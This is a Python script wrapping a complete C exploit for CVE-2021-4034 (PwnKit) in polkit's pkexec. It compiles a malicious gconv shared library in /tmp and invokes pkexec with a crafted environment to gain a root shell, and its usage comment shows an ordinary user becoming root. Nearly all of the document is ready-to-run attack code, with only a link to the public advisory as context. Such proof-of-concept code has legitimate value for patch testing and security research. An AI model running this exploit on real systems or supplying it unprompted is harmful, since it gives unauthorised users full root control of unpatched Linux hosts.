CVE-2021-4034 exploit in python

CVE-2021-4034.py

#!/bin/python
# Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by aynkl
"""
CVE information:
  - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Usage : 
$ id 
uid=1000(user) gid=1001(user) groups=1001(user)
$ python3 CVE-2021-4034.py 
# whoami
root
"""
import os


shell = """

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>



char *shell = 
	"#include <stdio.h>\\n"
	"#include <stdlib.h>\\n"
	"#include <unistd.h>\\n\\n"
	"void gconv() {}\\n"
	"void gconv_init() {\\n"
	"	setuid(0); setgid(0);\\n"
	"	seteuid(0); setegid(0);\\n"
	"	system(\\\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\\\");\\n"
	"	exit(0);\\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
"""

if __name__ == "__main__" : 
    os.chdir("/tmp")
    with open("cve.c" , "w") as fd : 
        fd.write(shell)
        fd.close()
    os.system("gcc cve.c -o cve.o && rm cve.c && ./cve.o ")